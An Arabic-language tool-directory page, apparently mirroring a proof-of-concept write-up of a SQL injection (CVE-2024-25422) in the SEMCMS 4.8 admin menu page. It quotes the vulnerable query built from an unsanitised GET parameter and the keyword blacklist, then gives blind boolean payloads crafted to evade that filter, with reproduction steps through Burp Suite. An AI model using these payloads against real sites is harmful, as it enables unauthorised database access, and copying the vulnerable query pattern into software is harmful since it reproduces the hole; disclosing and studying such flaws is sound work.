Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
semcms — ثغرة حقن SQL في semcms(CVE-2024-25422 ) | Kitploit
أدوات/GitHubGitHub/tzyyyyyyy/semcms
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubtzyyyyyyy/semcms

semcms

ثغرة حقن SQL في semcms(CVE-2024-25422 )

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مقدمة إلى Semcms

SEMCMS هو نظام إدارة محتوى (CMS) لمواقع التجارة الخارجية، ويدعم لغات متعددة.

root@kitploit:~
v4.8 Download Link: http://www.sem-cms.com/TradeCmsdown/php/semcms_php_4.8.zip

أسباب الثغرات:

/xcR45q_Admin/SEMCMS_Menu.php السطر 66

كود الثغرة:

root@kitploit:~
<?php
 } elseif ($type == "edit") {
 
   $row = mysqli_fetch_array($db_conn->query("SELECT * FROM sc_menu WHERE ID=" . $_GET["ID"]));
 
   ?>

يمكن ملاحظة أن المعامل ID هنا سينفّذ عبارة SQL عند تمرير المعاملات عبر GET

كود التصفية في /Include/contorl. PHP

السطر 151

root@kitploit:~
function test_input($data) { 
    //$data = str_replace("%", "percent", $data);
    $data = trim($data);
    $data = stripslashes($data);
    $data = htmlspecialchars($data,*ENT_QUOTES*);
    return $data;
  }

وفي السطر 8

root@kitploit:~
function inject_check_sql($sql_str) {
 
   return preg_match('/select|and|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str); 
 } 
 function verify_str($str) { 
    if(inject_check_sql($str)) {
      exit('Sorry,You do this is wrong! (.-.)');
     } 
   return $str;
 } 

من خلال تصفية المحتوى أعلاه، يمكننا بناء حمولة (Payload)

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

إعادة إنتاج الثغرات

قم بزيارة الموقع

root@kitploit:~
http://url/xcR45q_Admin/SEMCMS_Menu.php

التقاط الحزم عبر Brupsuite، ولأن طول اسم قاعدة البيانات هو 5 عند إنشاء موقع جديد، تم بناء الحمولة على النحو التالي:

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

(تحديد ما إذا كان طول اسم قاعدة البيانات هو 5)

أدخل الحمولة لعرض الاستجابة

clip_image002

غيّر الحمولة في هذا الوقت

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,54,36)

(تحديد ما إذا كان طول اسم قاعدة البيانات هو 6)

غيّر الحمولة في هذا الوقت

clip_image004

يمكن مواصلة حقن SQL بناءً على التغيرات التي تظهر على الصفحة لاحقًا

تنزيل الأداة